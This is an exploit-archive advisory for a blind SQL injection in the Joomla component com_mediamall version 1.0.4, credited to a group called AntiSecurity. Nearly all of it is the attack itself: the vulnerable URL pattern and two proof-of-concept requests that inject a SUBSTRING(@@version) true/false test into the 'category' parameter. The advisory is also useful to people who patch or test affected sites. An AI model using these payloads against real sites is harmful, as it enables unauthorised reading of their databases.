id: 11800
date: 04/14/2010
title: Joomla Component com_mediamall Blind SQL injection Vulnerability
author: AntiSecurity
cves: 

================================================================
Joomla Component com_mediamall Blind SQL injection Vulnerability
================================================================


===========================================================================================================
 
 
  [o] Joomla Component Media Mall Factory Blind SQLi Vulnerability
  
       Software : com_mediamall version 1.0.4
       Vendor   : http://www.thefactory.ro/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===========================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_mediamall&category=1[BSQL]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=5 << true
       http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=4 << false
 
 
===========================================================================================================



#  0day.today [2023-03-27]  #